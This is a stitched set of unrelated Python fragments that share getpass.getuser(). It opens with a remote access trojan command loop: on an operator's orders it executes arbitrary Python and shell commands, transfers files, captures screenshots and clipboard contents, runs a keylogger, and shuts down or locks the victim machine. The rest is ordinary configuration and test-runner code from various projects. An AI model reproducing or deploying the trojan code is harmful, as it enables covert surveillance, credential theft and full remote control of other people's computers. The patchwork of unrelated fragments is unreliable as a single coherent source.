        data = json_loads(self.receive())
        # data[0]: command
        # data[1]: data1
        # data[2]: data2
        # ...
        if data[0] == '<INFO>':
            self.send(json.dumps([
                platform.system(),
                os.path.expanduser('~'),
                getpass.getuser()
            ]).encode())
            continue
        if data[0] == '--i':
            self.send(b'<READY>')
            while 1:
                command = self.receive().decode()
                if command == '<QUIT>':
                    self.send(b'Quitting Python Interpreter...')
                    break
                old_stdout = sys.stdout
                redirected_output = sys.stdout = StringIO()
                try:
                    exec(command)
                    error = None
                except Exception as e:
                    error = errors(e, line=False)
                finally:
                    sys.stdout = old_stdout
                self.send(json.dumps([redirected_output.getvalue(), error]).encode())
            continue
        if data[0] == '--x':
            if data[1] == '1':
                self.send(b'Restarting Session...')
                break
            if data[1] == '2':
                self.send(b'Disconnecting Client...')
                self.socket.close()
                sys.exit(0)
        if data[0] == '--q':
            if data[1] == '1':
                if platform.system() == 'Windows':
                    self.send(b'Locked Client Machine')
                    ctypes.windll.user32.LockWorkStation()
                else:
                    self.send(b'Desktop Locking is only available on Windows Clients.')
                continue
            elif data[1] == '2':
                if platform.system() == 'Windows':
                    subprocess.Popen('shutdown /s /t 0', shell=True,
                                     stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                else:
                    subprocess.Popen('shutdown -h now', shell=True,
                                     stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            elif data[1] == '3':
                if platform.system() == 'Windows':
                    subprocess.Popen('shutdown /r /t 0', shell=True,
                                     stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                else:
                    subprocess.Popen('reboot now', shell=True,
                                     stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            time.sleep(5)  # if shutdowns or restarts didn't work
            break
        if data[0] == '--l':
            self.socket.send(b' ')
            continue
        if data[0] == '<LISTENING>':
            self.send(b'<DONE>')
        if data[0] == '--s':
            self.send(b'<RECEIVED>')
            with open(data[1], 'wb') as f:
                f.write(self.receive())
            self.send(b'File Transfer Successful')
            continue
        if data[0] == '--d':
            try:
                r = requests.get(data[1])
                with open(data[2], 'wb') as f:
                    f.write(r.content)
            except Exception as e:
                self.send('Error downloading file: {}\n'.format(
                    errors(e, line=False)).encode())
                continue
            self.send(b'Download Successful')
            continue
        if data[0] == '--c':
            try:
                pyperclip.copy(data[1])
                self.send(b'Copied Successfully')
            except Exception as e:
                self.send(errors(e).encode())
            continue
        if data[0] == '--u':
            self.send('User: {}\nOS: {} {} ({})\n'.format(
                os.environ['USERNAME'], platform.system(),
                platform.release(), platform.platform()).encode())
            continue
        if data[0] == '--g':
            if platform.system() == 'Windows':
                _file = '{}\\temp.png'.format(os.environ['TEMP'])
            else:
                _file = '{}/temp.png'.format(os.environ['HOME'])
            try:
                pyscreeze.screenshot(_file)
            except Exception as e:
                self.send(b'<ERROR>')
                self.receive()
                self.send(errors(e).encode())
                continue
            with open(_file, 'rb') as f:
                self.send(f.read())
            os.remove(_file)
            continue
        if data[0] == '--k start':
            if not _pynput:
                self.send(b'Keylogger is disabled due to import error.')
            if not KeyListener.running:
                KeyListener.start()
                self.send(b'Started Keylogger\n')
                continue
            self.send(b'Keylogger already running\n')
            continue
        if data[0] == '--k dump':
            if not _pynput:
                self.send(b'Keylogger is disabled due to import error.')
            global KeyboardLogs
            if not KeyListener.running:
                self.send(b'<NOTRUNNING>')
            else:
                self.send(KeyboardLogs.encode())
            continue
        if data[0] == '--k stop':
            if not _pynput:
                self.send(b'Keylogger is disabled due to import error.')
            if KeyListener.running:
                KeyListener.stop()
                threading.Thread.__init__(KeyListener)  # re-initialise thread
                KeyboardLogs = ''
                self.send(b'Keylogger Stopped')
                continue
            self.send(b'Keylogger not running')
            continue
        if data[0] == '--p':
            try:
                self.send(pyperclip.paste().encode())
            except Exception as e:
                self.send(errors(e).encode())
            continue
        if data[0] == '--r':
            filename = data[1]
            if not os.path.exists(filename):
                self.send(b'<TRANSFERERROR>')
                continue
            with open(filename, 'rb') as f:
                self.send(f.read())
            continue
        if data[0] == '<GETCWD>':
            self.send(os.getcwdb())
            continue
        if data[0] == 'cd':
            self.send(os.getcwdb())
            continue
        if data[0][:2].lower() == 'cd' or data[0][:5] == 'chdir':
            if platform.system() == 'Windows':
                _pwd = ' & cd'
            else:
                _pwd = '; pwd'
            process = subprocess.Popen(data[0] + _pwd, shell=True,
                                       stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            error = process.stderr.read().decode()
            if error == "":
                output = process.stdout.read().decode()
                newlines = output.count('\n')
                if newlines > 1:
                    process = subprocess.Popen(data[0], shell=True,
                                               stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                    self.send(json.dumps(
                        ['<ERROR>', process.stdout.read().decode()]).encode())
                else:
                    os.chdir(output.replace('\n', '').replace('\r', ''))
                    self.send(json.dumps([os.getcwd()]).encode())
            else:
                self.send(json.dumps(['<ERROR>', error]).encode())
            continue
        if len(data[0]) > 0:
            if data[0] == 'tree':
                data[0] = 'tree /A'
            process = subprocess.Popen(data[0], shell=True,
                                       stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            for line in iter(process.stdout.readline, ""):
                if line == b'':
                    break
                self.send(line.replace(b'\n', b''))
                if self.receive() == '--q':
                    kill(process.pid)
                    break
            self.send(process.stderr.read())
            self.receive()
            self.send(b'<DONE>')
            continue
""" Changes Galicaster default behaviour to show a menu to enter metadata before starting a manual recording. """ from galicaster.core import context import getpass from galicaster.utils import series as list_series from galicaster.classui.metadata import MetadataClass, DCTERMS, EQUIV import os from galicaster.utils.i18n import _ #DCTERMS = ["title", "creator", "description", "language", "isPartOf"] MAPPINGS = {'user': getpass.getuser()} def init(): dispatcher = context.get_dispatcher() dispatcher.connect("galicaster-init", post_init) def post_init(source=None): global recorder_ui global rec_button global metadata metadata = {}
import os
import getpass

try:
    USER = os.environ["SUDO_USER"]
except KeyError:
    USER = getpass.getuser()

CONFIG_DIR = os.path.join(os.path.expanduser("~{0}".format(USER)), ".pvpn-cli")
CONFIG_FILE = os.path.join(CONFIG_DIR, "pvpn-cli.cfg")
TEMPLATE_FILE = os.path.join(CONFIG_DIR, "template.ovpn")
SERVER_INFO_FILE = os.path.join(CONFIG_DIR, "serverinfo.json")
SPLIT_TUNNEL_FILE = os.path.join(CONFIG_DIR, "split_tunnel.txt")
OVPN_FILE = os.path.join(CONFIG_DIR, "connect.ovpn")
PASSFILE = os.path.join(CONFIG_DIR, "pvpnpass")
VERSION = "2.2.1"
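# Hedged sketch of the fallback order above: under sudo, getpass.getuser()
# usually resolves to "root", so SUDO_USER (set by sudo) wins when present
# and keeps CONFIG_DIR under the invoking user's home. Values are illustrative.
invoking_user = os.environ.get("SUDO_USER") or getpass.getuser()
print(invoking_user)  # e.g. "alice" under "sudo pvpn ...", not "root"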
        commentOn(comment_url, True, False, True, resultsurl)
    elif returncode != 0:
        print("Failed to test pull - sending comment to: " + comment_url)
        commentOn(comment_url, False, False, False, resultsurl)
    else:
        print("Successfully tested pull - sending comment to: " + comment_url)
        commentOn(comment_url, True, False, False, resultsurl)
    open(os.environ["TESTED_DB"], "a").write(commit + "\n")


def environ_default(setting, value):
    if setting not in os.environ:
        os.environ[setting] = value


if getpass.getuser() != "root":
    print("Run me as root!")
    sys.exit(1)

if "GITHUB_USER" not in os.environ or "GITHUB_AUTH_TOKEN" not in os.environ:
    print("GITHUB_USER and/or GITHUB_AUTH_TOKEN environment variables not set")
    sys.exit(1)

environ_default("CLONE_URL", "https://github.com/beginnercoin/beginnercoin.git")
environ_default("MINGW_DEPS_DIR", "/mnt/w32deps")
environ_default("SCRIPTS_DIR", "/mnt/test-scripts")
environ_default("CHROOT_COPY", "/mnt/chroot-tmp")
environ_default("CHROOT_MASTER", "/mnt/chroot")
environ_default("OUT_DIR", "/mnt/out")
environ_default("BUILD_PATH", "/mnt/beginnercoin")
# Prompt for the password at run time
import getpass

def svc_login(user, passwd):
    # stub: the body was redacted in the source; a real implementation
    # would validate (user, passwd) against a service
    return bool(passwd)

user = getpass.getuser()
user = input('Enter your username: ')  # overrides the detected user
passwd = getpass.getpass()

if svc_login(user, passwd):
    print('Yay!')
else:
    print('Boo!')
def development():
    """ Specify development hosts """
    env.user = getpass.getuser()
    env.hosts = ["localhost"]  # "host1", "host2", "host3"]
def check_updates_required():
    """Checks if there are manual updates required.

    Sometimes, especially in developer installs, some things need to be
    tweaked by hand before Review Board can be used on this server.
    """
    global _install_fine

    updates_required = []

    if not _install_fine:
        site_dir = os.path.dirname(settings.HTDOCS_ROOT)
        devel_install = (os.path.exists(
            os.path.join(settings.LOCAL_ROOT, 'manage.py')))
        siteconfig = None

        # Check if we can access a SiteConfiguration. There should always
        # be one, unless the user has erased stuff by hand.
        #
        # This also checks for any sort of errors in talking to the database.
        # This could be due to the database being down, or corrupt, or
        # tables locked, or an empty database, or other cases. We want to
        # catch this before getting the point where plain 500 Internal Server
        # Errors appear.
        try:
            siteconfig = SiteConfiguration.objects.get_current()
        except (DatabaseError, SiteConfiguration.DoesNotExist), e:
            updates_required.append(
                ('admin/manual-updates/database-error.html', {
                    'error': e,
                }))

        # Check if the version running matches the last stored version.
        # Only do this for non-debug installs, as it's really annoying on
        # a developer install.
        cur_version = get_version_string()

        if siteconfig and siteconfig.version != cur_version:
            updates_required.append(
                ('admin/manual-updates/version-mismatch.html', {
                    'current_version': cur_version,
                    'stored_version': siteconfig.version,
                    'site_dir': site_dir,
                    'devel_install': devel_install,
                }))

        # Check if the site has moved and the old media directory no longer
        # exists.
        if siteconfig and not os.path.exists(settings.STATIC_ROOT):
            new_media_root = os.path.join(settings.HTDOCS_ROOT, "static")

            if os.path.exists(new_media_root):
                siteconfig.set("site_media_root", new_media_root)
                settings.STATIC_ROOT = new_media_root

        # Check if the user has any pending static media configuration
        # changes they need to make.
        if siteconfig and 'manual-updates' in siteconfig.settings:
            stored_updates = siteconfig.settings['manual-updates']

            if not stored_updates.get('static-media', False):
                updates_required.append(
                    ('admin/manual-updates/server-static-config.html', {
                        'STATIC_ROOT': settings.STATIC_ROOT,
                        'SITE_ROOT': settings.SITE_ROOT,
                        'SITE_DIR': settings.LOCAL_ROOT,
                    }))

        # Check if there's a media/uploaded/images directory. If not, this is
        # either a new install or is using the old-style media setup and needs
        # to be manually upgraded.
        uploaded_dir = os.path.join(settings.MEDIA_ROOT, "uploaded")

        if not os.path.isdir(uploaded_dir) or \
           not os.path.isdir(os.path.join(uploaded_dir, "images")):
            updates_required.append(
                ("admin/manual-updates/media-upload-dir.html", {
                    'MEDIA_ROOT': settings.MEDIA_ROOT
                }))

        # (the source repeated this lookup verbatim inside the data-dir
        # check below; the duplicate has been folded into this single one)
        try:
            username = getpass.getuser()
        except ImportError:
            # This will happen if running on Windows (which doesn't have
            # the pwd module) and if %LOGNAME%, %USER%, %LNAME% and
            # %USERNAME% are all undefined.
            username = "******"

        # Check if the data directory (should be $HOME) is writable by us.
        data_dir = os.environ.get('HOME', '')

        if (not data_dir or
            not os.path.isdir(data_dir) or
            not os.access(data_dir, os.W_OK)):
            updates_required.append(('admin/manual-updates/data-dir.html', {
                'data_dir': data_dir,
                'writable': os.access(data_dir, os.W_OK),
                'server_user': username,
                'expected_data_dir': os.path.join(site_dir, 'data'),
            }))

        # Check if the htdocs/media/ext directory is writable by us.
        ext_dir = settings.EXTENSIONS_STATIC_ROOT

        if not os.path.isdir(ext_dir) or not os.access(ext_dir, os.W_OK):
            updates_required.append(('admin/manual-updates/ext-dir.html', {
                'ext_dir': ext_dir,
                'writable': os.access(ext_dir, os.W_OK),
                'server_user': username,
            }))

        if not is_exe_in_path('patch'):
            if sys.platform == 'win32':
                binaryname = 'patch.exe'
            else:
                binaryname = 'patch'

            updates_required.append(
                ("admin/manual-updates/install-patch.html", {
                    'platform': sys.platform,
                    'binaryname': binaryname,
                    'search_path': os.getenv('PATH'),
                }))

        #
        # NOTE: Add new checks above this.
        #

        _install_fine = not updates_required
def GetToken():
    user = getpass.getuser()
    return access_control.ACLToken(username=user)
def process_tool(self, args):
    """Process Tool execution in Faraday"""
    if not args.json_output:
        if not args.workspace_name:
            if active_config.workspace:
                workspace_name = active_config.workspace
            else:
                self._cmd.perror("No active Workspace")
                return
        else:
            workspace_name = args.workspace_name
        if not self._cmd.api_client.is_workspace_available(workspace_name):
            if not args.create_workspace:
                self._cmd.perror(f"Invalid workspace: {workspace_name}")
                return
            else:
                try:
                    self._cmd.api_client.create_workspace(workspace_name)
                    self._cmd.poutput(
                        cmd2.style(
                            f"Workspace {workspace_name} created",
                            fg=COLORS.GREEN,
                        )
                    )
                except Exception as e:
                    self._cmd.perror(f"Error creating workspace: {e}")
                    return
                else:
                    destination_workspace = workspace_name
        else:
            destination_workspace = workspace_name
    if args.plugin_id:
        plugin = self._cmd.plugins_manager.get_plugin(args.plugin_id)
        if not plugin:
            self._cmd.perror(f"Invalid Plugin: {args.plugin_id}")
            return
    else:
        plugin = self._cmd.command_analyzer.get_plugin(args.command)
    if plugin:
        if not args.json_output:
            self._cmd.poutput(
                cmd2.style(
                    f"{self._cmd.emojis['laptop']} "
                    f"Processing {plugin.id} command",
                    fg=COLORS.GREEN,
                )
            )
        show_command_output = not args.json_output
        command_json = utils.run_tool(
            plugin,
            getpass.getuser(),
            args.command,
            show_output=show_command_output,
        )
        if not command_json:
            self._cmd.perror(
                f"{self._cmd.emojis['cross']} Command execution error!!"
            )
        else:
            command_json = utils.apply_tags(
                command_json,
                args.tag_host,
                args.tag_service,
                args.tag_vuln,
            )
            if args.json_output:
                self._cmd.poutput(json.dumps(command_json, indent=4))
            else:
                self._cmd.data_queue.put(
                    {
                        "workspace": destination_workspace,
                        "json_data": command_json,
                    }
                )
    else:
        self._cmd.perror(
            f"Could not detect plugin for command: {args.command}"
        )
# modified from
# https://github.com/nickstenning/annotator-store-flask/blob/89b3037b995f094f73f24037123c0e818036e36c/annotator/store.py
import datetime
import json
import getpass

from annotator_model import DBMixin, Annotation, Range
import annotator_model as AModel

from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker

CURRENT_USER_ID = unicode(getpass.getuser())

__all__ = ["app", "store", "setup_app"]

# module level global
session = None


def setup_database(DSN):
    '''
    `DSN`: data source name; examples -
        in memory: sqlite:///:memory:
        sqlite (assumed use case): sqlite:///PATH/TO/YOUR/database.db
    '''
    global session
    if session is not None:
        return
    engine = create_engine(DSN)
    Session = sessionmaker(bind=engine)
    session = Session()
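# Hedged usage sketch: the DSN forms in the docstring map directly onto
# SQLAlchemy engine URLs; an in-memory database is enough for a smoke test.
setup_database('sqlite:///:memory:')
assert session is not None              # module-level session is now bound
setup_database('sqlite:///other.db')    # no-op: session is already initialised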
def run(args): import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) glb_file = args['--global-conf'] inventory_file = args['--inventory'] osp_cred_file = args['--osp-cred'] suite_file = args['--suite'] store = args.get('--store', False) reuse = args.get('--reuse', None) base_url = args.get('--rhs-ceph-repo', None) ubuntu_repo = args.get('--ubuntu-repo', None) kernel_repo = args.get('--kernel-repo', None) rhbuild = args.get('--rhbuild') docker_registry = args.get('--docker-registry', None) docker_image = args.get('--docker-image', None) docker_tag = args.get('--docker-tag', None) docker_insecure_registry = args.get('--insecure-registry', False) post_results = args.get('--post-results') skip_setup = args.get('--skip-cluster', False) skip_subscription = args.get('--skip-subscription', False) cleanup_name = args.get('--cleanup', None) post_to_report_portal = args.get('--report-portal', False) console_log_level = args.get('--log-level') log_directory = args.get('--log-dir', '/tmp') instances_name = args.get('--instances-name') osp_image = args.get('--osp-image') filestore = args.get('--filestore', False) ec_pool_vals = args.get('--use-ec-pool', None) ignore_latest_nightly_container = args.get('--ignore-latest-container', False) skip_version_compare = args.get('--skip-version-compare', False) custom_config = args.get('--custom-config') custom_config_file = args.get('--custom-config-file') xunit_results = args.get('--xunit-results', False) # Set log directory and get absolute path run_id = timestamp() run_dir = create_run_dir(run_id, log_directory) startup_log = os.path.join(run_dir, "startup.log") print("Startup log location: {}".format(startup_log)) run_start_time = datetime.datetime.now() trigger_user = getuser() handler = logging.FileHandler(startup_log) handler.setLevel(logging.INFO) handler.setFormatter(formatter) root.addHandler(handler) if console_log_level: ch.setLevel(logging.getLevelName(console_log_level.upper())) if osp_cred_file: with open(osp_cred_file, 'r') as osp_cred_stream: osp_cred = yaml.safe_load(osp_cred_stream) if cleanup_name is not None: cleanup_ceph_nodes(osp_cred, cleanup_name) return 0 # Get ceph cluster version name with open("rhbuild.yaml") as fd: rhbuild_file = yaml.safe_load(fd) ceph = rhbuild_file['ceph'] ceph_name = None rhbuild_ = None try: ceph_name, rhbuild_ =\ next(filter( lambda x: x, [(ceph[x]['name'], x) for x in ceph if x == rhbuild.split(".")[0]])) except StopIteration: print("\nERROR: Please provide correct RH build version, run exited.") sys.exit(1) # Get base-url composes = ceph[rhbuild_]['composes'] if not base_url: if rhbuild in composes: base_url = composes[rhbuild]['base_url'] else: base_url = composes['latest']['base_url'] # Get ubuntu-repo if not ubuntu_repo and rhbuild.startswith('3'): if rhbuild in composes: ubuntu_repo = composes[rhbuild]['ubuntu_repo'] else: ubuntu_repo = composes['latest']['ubuntu_repo'] if glb_file: conf_path = os.path.abspath(glb_file) with open(conf_path, 'r') as conf_stream: conf = yaml.safe_load(conf_stream) if inventory_file: inventory_path = os.path.abspath(inventory_file) with open(inventory_path, 'r') as inventory_stream: inventory = yaml.safe_load(inventory_stream) if suite_file: suites_path = os.path.abspath(suite_file) with open(suites_path, 'r') as suite_stream: suite = yaml.safe_load(suite_stream) if osp_image and inventory.get('instance').get('create'): inventory.get('instance').get('create').update({'image-name': osp_image}) compose_id = None if os.environ.get('TOOL') is not 
None: ci_message = json.loads(os.environ['CI_MESSAGE']) compose_id = ci_message['compose_id'] compose_url = ci_message['compose_url'] + "/" product_name = ci_message.get('product_name', None) product_version = ci_message.get('product_version', None) log.info("COMPOSE_URL = %s ", compose_url) if os.environ['TOOL'] == 'pungi': # is a rhel compose log.info("trigger on CI RHEL Compose") elif os.environ['TOOL'] == 'rhcephcompose': # is a ubuntu compose log.info("trigger on CI Ubuntu Compose") ubuntu_repo = compose_url log.info("using ubuntu repo" + ubuntu_repo) elif os.environ['TOOL'] == 'bucko': # is a docker compose log.info("Trigger on CI Docker Compose") docker_registry, docker_tag = ci_message['repository'].split('/rh-osbs/rhceph:') docker_image = 'rh-osbs/rhceph' log.info("\nUsing docker registry from ci message: {registry} \nDocker image: {image}\nDocker tag:{tag}" .format(registry=docker_registry, image=docker_image, tag=docker_tag)) log.warning('Using Docker insecure registry setting') docker_insecure_registry = True if product_name == 'ceph': # is a rhceph compose base_url = compose_url log.info("using base url" + base_url) image_name = inventory.get('instance').get('create').get('image-name') ceph_version = [] ceph_ansible_version = [] distro = [] clients = [] if inventory.get('instance').get('create'): distro.append(inventory.get('instance').get('create').get('image-name')) for cluster in conf.get('globals'): if cluster.get('ceph-cluster').get('inventory'): cluster_inventory_path = os.path.abspath(cluster.get('ceph-cluster').get('inventory')) with open(cluster_inventory_path, 'r') as inventory_stream: cluster_inventory = yaml.safe_load(inventory_stream) image_name = cluster_inventory.get('instance').get('create').get('image-name') distro.append(image_name.replace('.iso', '')) # get COMPOSE ID and ceph version id = requests.get(base_url + "/COMPOSE_ID") compose_id = id.text if 'rhel' in image_name.lower(): ceph_pkgs = requests.get(base_url + "/compose/Tools/x86_64/os/Packages/") m = re.search(r'ceph-common-(.*?).x86', ceph_pkgs.text) ceph_version.append(m.group(1)) m = re.search(r'ceph-ansible-(.*?).rpm', ceph_pkgs.text) ceph_ansible_version.append(m.group(1)) log.info("Compose id is: " + compose_id) else: ubuntu_pkgs = requests.get(ubuntu_repo + "/Tools/dists/xenial/main/binary-amd64/Packages") m = re.search(r'ceph\nVersion: (.*)', ubuntu_pkgs.text) ceph_version.append(m.group(1)) m = re.search(r'ceph-ansible\nVersion: (.*)', ubuntu_pkgs.text) ceph_ansible_version.append(m.group(1)) distro = ','.join(list(set(distro))) ceph_version = ', '.join(list(set(ceph_version))) ceph_ansible_version = ', '.join(list(set(ceph_ansible_version))) log.info("Testing Ceph Version: " + ceph_version) log.info("Testing Ceph Ansible Version: " + ceph_ansible_version) if not os.environ.get('TOOL') and not ignore_latest_nightly_container: try: latest_container = get_latest_container(rhbuild) except ValueError: print("\nERROR:No latest nightly container UMB msg at /ceph/cephci-jenkins/latest-rhceph-container-info/," "specify using the cli args or use --ignore-latest-container") sys.exit(1) docker_registry = latest_container.get('docker_registry') if not docker_registry else docker_registry docker_image = latest_container.get('docker_image') if not docker_image else docker_image docker_tag = latest_container.get('docker_tag') if not docker_tag else docker_tag log.info("Using latest nightly docker image \nRegistry: {registry} \nDocker image: {image}\nDocker tag:{tag}" .format(registry=docker_registry, 
                     image=docker_image, tag=docker_tag))
        docker_insecure_registry = True
        log.warning('Using Docker insecure registry setting')

    service = None
    suite_name = os.path.basename(suite_file).split(".")[0]
    if post_to_report_portal:
        log.info("Creating report portal session")
        service = create_report_portal_session()
        launch_name = "{suite_name} ({distro})".format(suite_name=suite_name, distro=distro)
        launch_desc = textwrap.dedent(
            """
            ceph version: {ceph_version}
            ceph-ansible version: {ceph_ansible_version}
            compose-id: {compose_id}
            invoked-by: {user}
            """.format(ceph_version=ceph_version,
                       ceph_ansible_version=ceph_ansible_version,
                       user=getuser(),
                       compose_id=compose_id))
        if docker_image and docker_registry and docker_tag:
            launch_desc = launch_desc + textwrap.dedent(
                """
                docker registry: {docker_registry}
                docker image: {docker_image}
                docker tag: {docker_tag}
                invoked-by: {user}
                """.format(docker_registry=docker_registry,
                           docker_image=docker_image,
                           user=getuser(),
                           docker_tag=docker_tag))
        service.start_launch(name=launch_name, start_time=timestamp(), description=launch_desc)

    if reuse is None:
        ceph_cluster_dict, clients = create_nodes(conf, inventory, osp_cred, run_id, service, instances_name)
    else:
        ceph_store_nodes = open(reuse, 'rb')
        ceph_cluster_dict = pickle.load(ceph_store_nodes)
        ceph_store_nodes.close()
        for cluster_name, cluster in ceph_cluster_dict.items():
            for node in cluster:
                node.reconnect()
    if store:
        ceph_clusters_file = 'rerun/ceph-snapshot-' + timestamp()
        if not os.path.exists(os.path.dirname(ceph_clusters_file)):
            os.makedirs(os.path.dirname(ceph_clusters_file))
        store_cluster_state(ceph_cluster_dict, ceph_clusters_file)

    for test_dir in ('tests', 'tests/rados', 'tests/rbd', 'tests/rbd_mirror',
                     'tests/cephfs', 'tests/iscsi', 'tests/rgw', 'tests/ceph_ansible',
                     'tests/ceph_installer', 'tests/mgr', 'tests/dashboard', 'tests/misc_env'):
        sys.path.append(os.path.abspath(test_dir))

    tests = suite.get('tests')
    tcs = []
    jenkins_rc = 0

    # use ceph_test_data to pass around dynamic data between tests
    ceph_test_data = dict()
    ceph_test_data['custom-config'] = custom_config
    ceph_test_data['custom-config-file'] = custom_config_file

    for test in tests:
        test = test.get('test')
        tc = dict()
        tc['docker-containers-list'] = []
        tc['name'] = test.get('name')
        tc['desc'] = test.get('desc')
        tc['file'] = test.get('module')
        tc['polarion-id'] = test.get('polarion-id')
        polarion_default_url = "https://polarion.engineering.redhat.com/polarion/#/project/CEPH/workitem?id="
        tc['polarion-id-link'] = "{}{}".format(polarion_default_url, tc['polarion-id'])
        tc['rhbuild'] = rhbuild
        tc['ceph-version'] = ceph_version
        tc['ceph-ansible-version'] = ceph_ansible_version
        tc['compose-id'] = compose_id
        tc['distro'] = distro
        tc['suite-name'] = suite_name
        tc['suite-file'] = suite_file
        tc['conf-file'] = glb_file
        tc['ceph-version-name'] = ceph_name
        test_file = tc['file']
        report_portal_description = tc['desc'] or ''
        unique_test_name = create_unique_test_name(tc['name'], test_names)
        test_names.append(unique_test_name)
        tc['log-link'] = configure_logger(unique_test_name, run_dir)
        mod_file_name = os.path.splitext(test_file)[0]
        test_mod = importlib.import_module(mod_file_name)
        print("\nRunning test: {test_name}".format(test_name=tc['name']))
        if tc.get('log-link'):
            print("Test logfile location: {log_url}".format(log_url=tc['log-link']))
        log.info("Running test %s", test_file)
        tc['duration'] = '0s'
        tc['status'] = 'Not Executed'
        start = datetime.datetime.now()
        for cluster_name in test.get('clusters', ceph_cluster_dict):
            if test.get('clusters'):
                config = test.get('clusters').get(cluster_name).get('config', {})
            else:
                config = test.get('config', {})
            if not config.get('base_url'):
                config['base_url'] = base_url
            config['rhbuild'] = rhbuild
            if 'ubuntu_repo' in locals():
                config['ubuntu_repo'] = ubuntu_repo
            if skip_setup is True:
                config['skip_setup'] = True
            if skip_subscription is True:
                config['skip_subscription'] = True
            if args.get('--add-repo'):
                repo = args.get('--add-repo')
                if repo.startswith('http'):
                    config['add-repo'] = repo
            config['docker-insecure-registry'] = docker_insecure_registry
            config['skip_version_compare'] = skip_version_compare
            if config and config.get('ansi_config'):
                if docker_registry:
                    config.get('ansi_config')['ceph_docker_registry'] = str(docker_registry)
                if docker_image:
                    config.get('ansi_config')['ceph_docker_image'] = str(docker_image)
                if docker_tag:
                    config.get('ansi_config')['ceph_docker_image_tag'] = str(docker_tag)
                cluster_docker_registry = config.get('ansi_config').get('ceph_docker_registry')
                cluster_docker_image = config.get('ansi_config').get('ceph_docker_image')
                cluster_docker_tag = config.get('ansi_config').get('ceph_docker_image_tag')
                if cluster_docker_registry:
                    report_portal_description = report_portal_description + \
                        '\ndocker registry: {docker_registry}'.format(docker_registry=cluster_docker_registry)
                if cluster_docker_image:
                    report_portal_description = report_portal_description + \
                        '\ndocker image: {docker_image}'.format(docker_image=cluster_docker_image)
                if cluster_docker_tag:
                    report_portal_description = report_portal_description + \
                        '\ndocker tag: {docker_tag}'.format(docker_tag=cluster_docker_tag)
                if cluster_docker_image and cluster_docker_registry:
                    tc['docker-containers-list'].append('{docker_registry}/{docker_image}:{docker_tag}'.format(
                        docker_registry=cluster_docker_registry,
                        docker_image=cluster_docker_image,
                        docker_tag=cluster_docker_tag))
            if filestore:
                config['filestore'] = filestore
            if ec_pool_vals:
                config['ec-pool-k-m'] = ec_pool_vals
            if args.get('--hotfix-repo'):
                hotfix_repo = args.get('--hotfix-repo')
                if hotfix_repo.startswith('http'):
                    config['hotfix_repo'] = hotfix_repo
            if kernel_repo is not None:
                config['kernel-repo'] = kernel_repo
            if osp_cred:
                config['osp_cred'] = osp_cred
            # if a kernel repo is defined in the environment, set the value in config
            if os.environ.get('KERNEL-REPO-URL') is not None:
                config['kernel-repo'] = os.environ.get('KERNEL-REPO-URL')
            try:
                if post_to_report_portal:
                    service.start_test_item(name=unique_test_name,
                                            description=report_portal_description,
                                            start_time=timestamp(),
                                            item_type="STEP")
                    service.log(time=timestamp(),
                                message="Logfile location: {}".format(tc['log-link']),
                                level="INFO")
                    service.log(time=timestamp(),
                                message="Polarion ID: {}".format(tc['polarion-id']),
                                level="INFO")
                rc = test_mod.run(ceph_cluster=ceph_cluster_dict[cluster_name],
                                  ceph_nodes=ceph_cluster_dict[cluster_name],
                                  config=config,
                                  test_data=ceph_test_data,
                                  ceph_cluster_dict=ceph_cluster_dict,
                                  clients=clients)
            except BaseException:
                if post_to_report_portal:
                    service.log(time=timestamp(), message=traceback.format_exc(), level="ERROR")
                log.error(traceback.format_exc())
                rc = 1
            finally:
                if store:
                    store_cluster_state(ceph_cluster_dict, ceph_clusters_file)
            if rc != 0:
                break
        elapsed = (datetime.datetime.now() - start)
        tc['duration'] = elapsed
        if rc == 0:
            tc['status'] = 'Pass'
            msg = "Test {} passed".format(test_mod)
            log.info(msg)
            print(msg)
            if post_to_report_portal:
                service.finish_test_item(end_time=timestamp(), status="PASSED")
            if post_results:
                post_to_polarion(tc=tc)
        else:
            tc['status'] = 'Failed'
            msg = "Test {} failed".format(test_mod)
            log.info(msg)
            print(msg)
            jenkins_rc = 1
            if post_to_report_portal:
                service.finish_test_item(end_time=timestamp(), status="FAILED")
            if post_results:
                post_to_polarion(tc=tc)
            if test.get('abort-on-fail', False):
                log.info("Aborting on test failure")
                tcs.append(tc)
                break
        if test.get('destroy-cluster') is True:
            cleanup_ceph_nodes(osp_cred, instances_name)
        if test.get('recreate-cluster') is True:
            ceph_cluster_dict, clients = create_nodes(conf, inventory, osp_cred, run_id, service, instances_name)
        tcs.append(tc)

    url_base = "http://magna002.ceph.redhat.com/cephci-jenkins"
    run_dir_name = run_dir.split('/')[-1]
    log.info("\nAll test logs located here: {base}/{dir}".format(base=url_base, dir=run_dir_name))
    close_and_remove_filehandlers()
    if post_to_report_portal:
        service.finish_launch(end_time=timestamp())
        service.terminate()
    if xunit_results:
        create_xunit_results(suite_name, tcs, run_dir)
    print("\nAll test logs located here: {base}/{dir}".format(base=url_base, dir=run_dir_name))
    print_results(tcs)
    send_to_cephci = post_results or post_to_report_portal
    run_end_time = datetime.datetime.now()
    total_run_time = (datetime.datetime.now() - run_start_time)
    total_time = """'''Start Time:''' {a} '''End Time:''' {b} '''Total duration:'''{c} \
""".format(a=run_start_time, b=run_end_time, c=total_run_time)
    email_results(tcs, run_id, trigger_user, run_dir, total_time, send_to_cephci)
    return jenkins_rc
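# A minimal sketch (an assumption, not part of the original suite) of a test
# module compatible with the runner above: the runner imports the module named
# in the suite yaml's 'module' key and calls its run(), treating a return value
# of 0 as Pass and anything else as Failed.
def run(ceph_cluster=None, config=None, test_data=None, **kwargs):
    """Hypothetical test: check that every node object in the cluster is usable."""
    for node in ceph_cluster or []:
        if node is None:
            return 1  # non-zero marks the test as Failed in the runner
    return 0          # zero marks the test as Pass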
import os
from datetime import datetime, timedelta
import re
import getpass

# read ssh credentials from environment
key = os.environ.get('GPUMONITOR_KEY', None)
password = os.environ.get('GPUMONITOR_PASS', None)
user = os.environ.get('GPUMONITOR_USER', getpass.getuser())
if user is None:
    raise ValueError('username for SSH is not set')

# interval to iterate through servers
update_interval = timedelta(seconds=30)

# file to write cache to
